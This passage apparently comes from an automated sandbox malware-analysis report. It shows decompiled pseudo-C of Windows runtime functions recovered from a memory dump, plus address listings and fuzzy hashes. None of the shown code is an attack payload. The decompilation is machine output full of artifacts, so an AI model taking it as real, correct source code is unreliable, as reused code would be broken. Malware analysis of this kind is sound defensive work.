																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E00FE4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E00F6D130(_t427, _t494, _t511);
				}
			}

0x00fe5ba5
0x00fe5baa
0x00fe5baf
0x00fe5bb4
0x00fe5bb6
0x00fe5bbc
0x00fe5bbe
0x00fe5bc4
0x00fe5bcd
0x00fe5bd3
0x00fe5bd6
0x00fe5bdc
0x00fe5be0
0x00fe5be3
0x00fe5beb
0x00fe5bf2
0x00fe5bf8
0x00fe5bfe
0x00fe5c04
0x00fe5c0e
0x00fe5c18
0x00fe5c1f
0x00fe5c25
0x00fe5c2a
0x00fe5c2c
0x00fe5c32
0x00fe5c3a
0x00fe5c3f
0x00fe5c42
0x00fe5c48
0x00fe5c5b
0x00fe5c5b
0x00fe5c2c
0x00fe5cb7
0x00fe5cb9
0x00fe5cbf
0x00fe5cc2
0x00fe5cca
0x00fe5ccb
0x00fe5ccb
0x00fe5cd1
0x00fe5cd7
0x00fe5cda
0x00fe5ce1
0x00fe5ce4
0x00fe5ce7
0x00fe5ced
0x00fe5cf3
0x00fe5cf9
0x00fe5cff
0x00fe5d08
0x00fe5d0a
0x00fe5d0e
0x00fe5d10
0x00000000
0x00000000
0x00fe5d16
0x00fe5d1a
0x00000000
0x00000000
0x00fe5d20
0x00fe5d22
0x00fe5d25
0x00fe5d2f
0x00fe5d2f
0x00fe5d33
0x00fe5d3d
0x00fe5d49
0x00fe5d4b
0x00000000
0x00000000
0x00fe5d5a
0x00fe5d5d
0x00fe5d60
0x00000000
0x00000000
0x00fe5d66
0x00fe5d69
0x00000000
0x00000000
0x00fe5d6f
0x00fe5d6f
0x00fe5d73
0x00fe5d79
0x00fe5d7f
0x00fe5d86
0x00fe5d95
0x00fe5d98
0x00fe5dba
0x00fe5dcb
0x00fe5dce
0x00fe5dd3
0x00fe5dd6
0x00fe5dd8
0x00fe5de6
0x00fe5dec
0x00fe5dee
0x00fe5df1
0x00fe5df3
0x00fe635a
0x00fe635a
0x00000000
0x00fe635a
0x00fe5dfe
0x00fe5e02
0x00fe5e05
0x00fe5e07
0x00fe5e10
0x00fe5e13
0x00fe5e1b
0x00fe5e1c
0x00fe5e21
0x00fe5e22
0x00fe5e23
0x00fe5e25
0x00fe5e2a
0x00fe5e2c
0x00fe5e2e
0x00fe5e36
0x00fe5e39
0x00fe5e42
0x00fe5e47
0x00fe5e4d
0x00fe5e54
0x00fe5e54
0x00fe5e54
0x00fe5e2e
0x00fe5e5c
0x00fe5e5f
0x00fe5e62
0x00fe5e64
0x00fe5e6b
0x00fe5e70
0x00fe5e7a
0x00fe5e7a
0x00fe5e7a
0x00fe5e6b
0x00fe5e7e
0x00fe5e7f
0x00fe5e7f
0x00fe5e81
0x00fe5e87
0x00fe5e8b
0x00fe5e8c
0x00fe5e8c
0x00fe5e8c
0x00fe5e9a
0x00fe5e9c
0x00fe5ea2
0x00fe5ea6
0x00fe5f50
0x00fe5f50
0x00fe5f57
0x00fe5f66
0x00fe5f66
0x00fe5f66
0x00fe5f68
0x00fe5f6a
0x00fe63d0
0x00000000
0x00fe5f70
0x00fe5f70
0x00fe5f91
0x00fe5f9c
0x00fe5f9e
0x00fe5fa4
0x00fe5fa6
0x00fe638c
0x00fe6392
0x00fe63a1
0x00fe63a7
0x00fe63af
0x00fe63af
0x00fe63bd
0x00fe63d8
0x00000000
0x00fe63d8
0x00fe5fac
0x00fe5fb2
0x00fe5fb4
0x00fe5fbd
0x00fe5fc6
0x00fe5fce
0x00fe5fd4
0x00fe5fdc
0x00fe5fec
0x00fe5fed
0x00fe5fee
0x00fe5fef
0x00fe5ff9
0x00fe5ffa
0x00fe5ffb
0x00fe5ffc
0x00fe6000
0x00fe6004
0x00fe6012
0x00fe6012
0x00fe6018
0x00fe6019
0x00fe601a
0x00fe601b
0x00fe601c
0x00fe6020
0x00fe6059
0x00fe605c
0x00fe6061
0x00fe6061
0x00fe6022
0x00fe6022
0x00fe6022
0x00fe6025
0x00fe602a
0x00fe602b
0x00fe6031
0x00fe6037
0x00fe6038
0x00fe603e
0x00fe6048
0x00fe6049
0x00fe604a
0x00fe604b
0x00fe604c
0x00fe604d
0x00fe6053
0x00fe6054
0x00fe6054
0x00fe6062
0x00fe6065
0x00fe6067
0x00fe606a
0x00fe6070
0x00fe6075
0x00fe6076
0x00fe6081
0x00fe6087
0x00fe6095
0x00fe6099
0x00fe609e
0x00fe60a4
0x00fe60ae
0x00fe60b0
0x00fe60b3
0x00fe60b6
0x00fe60b8
0x00fe60ba
0x00fe60ba
0x00fe60ba
0x00fe60ba
0x00fe60be
0x00fe60c0
0x00fe60c5
0x00fe60c5
0x00fe60c5
0x00fe60c6
0x00fe60cd
0x00fe6114
0x00fe60cf
0x00fe60cf
0x00fe60d4
0x00fe60d5
0x00fe60da
0x00fe60db
0x00fe60e1
0x00fe60e2
0x00fe60e8
0x00fe60f8
0x00fe60fd
0x00fe60fe
0x00fe6102
0x00fe6104
0x00fe6107
0x00fe6109
0x00fe610b
0x00fe610b
0x00fe610b
0x00fe610b
0x00fe610f
0x00fe610f
0x00fe6117
0x00fe611a
0x00fe611f
0x00fe6125
0x00fe6134
0x00fe6139
0x00fe613f
0x00fe6146
0x00fe6148
0x00fe614b
0x00fe614d
0x00fe614f
0x00fe614f
0x00fe614f
0x00fe614f
0x00fe6153
0x00fe6159
0x00fe6159
0x00fe615c
0x00fe6163
0x00fe6169
0x00fe616c
0x00fe6172
0x00fe6181
0x00fe6186
0x00fe6187
0x00fe618b
0x00fe6191
0x00fe6195
0x00fe61a3
0x00fe61bb
0x00fe61c0
0x00fe61c3
0x00fe61cc
0x00fe61d0
0x00fe61dc
0x00fe61de
0x00fe61e1
0x00fe61e4
0x00fe61e6
0x00fe61e8
0x00fe61e8
0x00fe61e8
0x00fe61e8
0x00fe61e6
0x00fe61ec
0x00fe61f3
0x00fe6203
0x00fe6209
0x00fe620a
0x00fe6216
0x00fe621d
0x00fe6227
0x00fe6241
0x00fe6246
0x00fe624c
0x00fe6257
0x00fe6259
0x00fe625c
0x00fe625e
0x00fe6260
0x00fe6260
0x00fe6260
0x00fe6260
0x00fe625e
0x00fe6264
0x00fe6267
0x00fe6269
0x00fe6315
0x00fe6315
0x00fe631b
0x00fe631e
0x00fe6324
0x00fe6327
0x00fe632f
0x00fe6330
0x00fe6333
0x00fe633a
0x00fe633c
0x00fe6335
0x00fe6335
0x00fe6335
0x00fe633f
0x00fe6342
0x00fe634c
0x00fe6352
0x00fe6355
0x00fe6355
0x00fe6359
0x00000000
0x00fe626f
0x00fe6275
0x00fe6275
0x00fe6278
0x00fe627e
0x00fe627e
0x00fe6281
0x00fe6287
0x00fe628d
0x00fe6298
0x00fe629c
0x00fe62a2
0x00fe629e
0x00fe629e
0x00fe629e
0x00fe62a7
0x00fe62a7
0x00fe62aa
0x00fe62b0
0x00fe62f0
0x00fe62f0
0x00fe62f2
0x00fe62f8
0x00fe62fd
0x00fe62b2
0x00fe62b2
0x00fe62b2
0x00fe62b5
0x00fe62dd
0x00fe62e2
0x00fe62e5
0x00fe62b7
0x00fe62b8
0x00fe62bb
0x00fe62bd
0x00fe62c0
0x00fe62c4
0x00fe62cd
0x00fe62cd
0x00fe62c0
0x00fe62bb
0x00fe62b5
0x00fe6302
0x00fe6303
0x00fe6305
0x00fe6305
0x00fe6305
0x00fe630c
0x00fe630c
0x00000000
0x00fe627e
0x00fe6269
0x00fe5eac
0x00fe5ebb
0x00fe5ebe
0x00fe5ecb
0x00fe5ecb
0x00fe5ece
0x00fe5ece
0x00fe5ed4
0x00fe5ed7
0x00fe5ed9
0x00fe5edb
0x00fe5edb
0x00fe5ee1
0x00fe5ee1
0x00fe5ee3
0x00fe5f20
0x00fe5f20
0x00fe5ee5
0x00fe5ee5
0x00fe5ee5
0x00fe5ee8
0x00fe5f11
0x00fe5f18
0x00fe5eea
0x00fe5eea
0x00fe5eed
0x00fe5ef2
0x00fe5ef8
0x00fe5efb
0x00fe5f0a
0x00fe5f0a
0x00fe5eed
0x00fe5ee8
0x00fe5f22
0x00fe5f28
0x00000000
0x00000000
0x00fe5f30
0x00fe5f31
0x00fe5f37
0x00fe5f3a
0x00fe5f3d
0x00fe5f44
0x00000000
0x00000000
0x00000000
0x00fe5f46
0x00fe5f48
0x00fe5f4d
0x00000000
0x00fe5f4d
0x00fe5dda
0x00fe5ddf
0x00000000
0x00fe5ddf
0x00fe5dd8
0x00fe5da7
0x00fe5da9
0x00fe5dac
0x00fe5dae
0x00000000
0x00fe5db4
0x00fe5db4
0x00000000
0x00fe5db4
0x00fe5dae
0x00fe5d88
0x00fe5d8d
0x00fe6363
0x00fe6369
0x00fe636a
0x00fe6370
0x00fe6372
0x00fe637a
0x00fe637b
0x00fe637d
0x00000000
0x00000000
0x00fe637f
0x00fe6385
0x00000000
0x00fe6385
0x00fe5d38
0x00fe5d3b
0x00000000
0x00000000
0x00000000
0x00fe5d3b
0x00fe5d27
0x00fe5d29
0x00000000
0x00000000
0x00000000
0x00fe6360
0x00000000
0x00fe6360
0x00fe5c10
0x00fe5c10
0x00fe63da
0x00fe63e5
0x00fe63e5

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dd3bf132260c86d9d10993c40fd57a87ab6e2bc62e9f435bee3bffba34be52d
Instruction ID: 847d984e52f32e927edbf9e607ae459fde94f452a3fb8ff4aa4d749ab8d1fc07
Opcode Fuzzy Hash: 4dd3bf132260c86d9d10993c40fd57a87ab6e2bc62e9f435bee3bffba34be52d
Instruction Fuzzy Hash: DF427771E00269CFDB20CF69C880BA9B7B1FF59714F1481AAE94DEB242D7349A85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F420A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00F420A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1008714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E00F42EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E00F42EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E00F158EC(_t240);
									_t221 =  *0x1005cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1005cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E00F54A2C(0x1006e40, 0xf54b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E00F37D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0xef5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E00F4F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E00F4F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E00F97016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L00F32400(_t267 + 0x20);
															}
															L00F32400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E00F42397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E00F32280(_t134, 0x1008608);
									__eflags =  *0x1006e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E00F2FFB0(_t198, _t241, 0x1008608);
										__eflags = _t253;
										if(_t253 != 0) {
											L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1006e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1008608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E00F46B90(_t210,  &_v64);
										_t262 =  *0x1008608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E00F4E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E00F597C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E00F5006A(0x1008608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1008608);
												E00F5B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1006904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1006e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E00F2FFB0(_t198, _t240, 0x1008608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E00F500C2(0x1008608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x00f420a0
0x00f420a8
0x00f420ad
0x00f420b3
0x00f420b8
0x00f420c2
0x00f420c7
0x00f420cb
0x00f420d2
0x00f42263
0x00f42266
0x00f85836
0x00f85836
0x00000000
0x00f4226c
0x00f4226c
0x00f42270
0x00f42274
0x00f420e2
0x00f420e2
0x00f420e6
0x00f420ee
0x00f857dc
0x00f857de
0x00f857ec
0x00f857ec
0x00f857f1
0x00f857f3
0x00f857f8
0x00000000
0x00f857f8
0x00f857e0
0x00f857e4
0x00f857ea
0x00000000
0x00000000
0x00000000
0x00f857ea
0x00f420f4
0x00f420f4
0x00f420f8
0x00f420f8
0x00f420fc
0x00f42100
0x00f42106
0x00f42201
0x00f42206
0x00f4220b
0x00f4220e
0x00f422a9
0x00f422ac
0x00000000
0x00000000
0x00f422b2
0x00f422b5
0x00f85801
0x00f85806
0x00000000
0x00000000
0x00f85810
0x00f85815
0x00f85818
0x00000000
0x00000000
0x00f8581e
0x00f422bb
0x00f422bb
0x00f42218
0x00f42218
0x00f4221c
0x00f42220
0x00f42222
0x00f422c2
0x00f422c4
0x00f422dc
0x00f422dc
0x00f422e1
0x00000000
0x00000000
0x00000000
0x00f422e7
0x00f422c8
0x00f422cd
0x00f422d3
0x00f422d6
0x00f85823
0x00f85825
0x00f85827
0x00000000
0x00000000
0x00f8582d
0x00000000
0x00f8582d
0x00000000
0x00f42228
0x00f42228
0x00000000
0x00f42228
0x00f42222
0x00f42214
0x00f42214
0x00000000
0x00f42114
0x00f42114
0x00f42114
0x00f4211a
0x00f4211c
0x00f42348
0x00f4234d
0x00f85840
0x00f85845
0x00f85848
0x00f8584e
0x00f8584e
0x00f85848
0x00f42353
0x00f42355
0x00f42388
0x00f42388
0x00f42368
0x00f4236a
0x00f4236c
0x00f4238f
0x00000000
0x00f4236e
0x00f4236e
0x00f4218e
0x00f4218e
0x00f42191
0x00f42195
0x00f85a03
0x00f85a06
0x00f85a0c
0x00f85a0f
0x00f85a11
0x00f85a13
0x00f85a13
0x00f85a19
0x00f85a1f
0x00000000
0x00f4219b
0x00f4219b
0x00f421a0
0x00f42282
0x00f42284
0x00f42284
0x00f42284
0x00f42284
0x00f421a6
0x00f421a9
0x00f421ac
0x00f421ae
0x00f421b3
0x00f4228b
0x00f42290
0x00f42379
0x00f42296
0x00f42298
0x00f42298
0x00f42290
0x00f421b9
0x00f421be
0x00f422a2
0x00f422a2
0x00f421c4
0x00f421c8
0x00f421cc
0x00f421d0
0x00f421d4
0x00f421de
0x00f421e3
0x00f85a29
0x00f85a2c
0x00000000
0x00000000
0x00f85a3b
0x00000000
0x00f421e9
0x00f421e9
0x00f421e9
0x00f421ee
0x00f421f1
0x00f85a45
0x00f85a4b
0x00f85a52
0x00f85a58
0x00f85a5d
0x00f85a5f
0x00f85a71
0x00f85a61
0x00f85a6a
0x00f85a6a
0x00f85a76
0x00f85a79
0x00f85a7f
0x00f85a83
0x00f85a85
0x00f85a87
0x00f85a87
0x00f85a8c
0x00f85a91
0x00f85a97
0x00f85a9f
0x00f85aa0
0x00f85aa1
0x00f85aa6
0x00f85aab
0x00f85ab1
0x00f85ab3
0x00f85ab9
0x00f85aca
0x00f85ad4
0x00f85ad4
0x00f85ade
0x00f85ade
0x00f85aab
0x00f85a79
0x00f85a52
0x00f421f7
0x00f421f9
0x00f421fe
0x00f421fe
0x00f421e3
0x00f42195
0x00f4236c
0x00f42122
0x00f42122
0x00f42124
0x00f42231
0x00f42236
0x00f42236
0x00f42238
0x00f42238
0x00f42240
0x00f42242
0x00f42244
0x00f859fc
0x00f4218c
0x00f4218c
0x00000000
0x00f4218c
0x00f4224a
0x00f4224f
0x00f42256
0x00f42304
0x00f42309
0x00f4230f
0x00f4231e
0x00f4231e
0x00f4231e
0x00f42320
0x00f42325
0x00f4232a
0x00f4232c
0x00f4233e
0x00f4233e
0x00000000
0x00f4232c
0x00f42311
0x00f42317
0x00f4231a
0x00f4231c
0x00f42380
0x00f42380
0x00f42380
0x00f42384
0x00000000
0x00000000
0x00f42386
0x00000000
0x00f4231c
0x00f4225c
0x00f4225c
0x00000000
0x00f4225c
0x00f4212a
0x00f42134
0x00f42138
0x00f4213d
0x00f85858
0x00f85863
0x00f85863
0x00f85867
0x00f8586a
0x00000000
0x00000000
0x00f8586c
0x00f8586c
0x00f85871
0x00f85875
0x00f85877
0x00f85997
0x00f8599c
0x00f859a1
0x00f859a7
0x00f859a7
0x00000000
0x00f859a7
0x00f8587d
0x00000000
0x00f8588b
0x00f8588b
0x00f85890
0x00f85892
0x00f85894
0x00f85899
0x00f8589b
0x00f858a0
0x00f858a0
0x00f858aa
0x00f858b2
0x00f858b6
0x00f858be
0x00f858c6
0x00f858c9
0x00f8590d
0x00f85917
0x00f8591a
0x00f8591c
0x00f85920
0x00f85928
0x00f8592a
0x00f8592c
0x00f8592e
0x00f8592e
0x00f858cb
0x00f858cd
0x00f858d8
0x00f858e0
0x00f858f4
0x00f858fe
0x00f858fe
0x00f8593a
0x00f8593e
0x00f85940
0x00f85942
0x00000000
0x00f85944
0x00f85944
0x00f85949
0x00f8594e
0x00f8594e
0x00f85953
0x00f8595b
0x00f85976
0x00f85976
0x00f8597a
0x00f8597f
0x00000000
0x00000000
0x00000000
0x00000000
0x00f85981
0x00f85981
0x00f85981
0x00f85983
0x00f85988
0x00f8598d
0x00f85991
0x00f85991
0x00000000
0x00f8595d
0x00f8595d
0x00f85963
0x00f85965
0x00000000
0x00000000
0x00000000
0x00000000
0x00f85967
0x00f85967
0x00f8596b
0x00f8596d
0x00000000
0x00000000
0x00f8596f
0x00f85971
0x00f85971
0x00f85974
0x00000000
0x00000000
0x00000000
0x00f85974
0x00000000
0x00f85967
0x00f8595b
0x00f85942
0x00f85863
0x00f42143
0x00f42143
0x00f42149
0x00f4214f
0x00f422f1
0x00f422f6
0x00000000
0x00f42173
0x00f42173
0x00f4217d
0x00f42181
0x00f42186
0x00f859ae
0x00f859b2
0x00f859b5
0x00f859b7
0x00f859ba
0x00f859cd
0x00f859d1
0x00f859d5
0x00f859d9
0x00f859db
0x00000000
0x00000000
0x00f859dd
0x00f859dd
0x00f859e1
0x00f859e4
0x00f859e7
0x00f859ee
0x00f859ee
0x00f859f3
0x00f859f3
0x00000000
0x00f42186
0x00f4214f
0x00f42106
0x00f42266
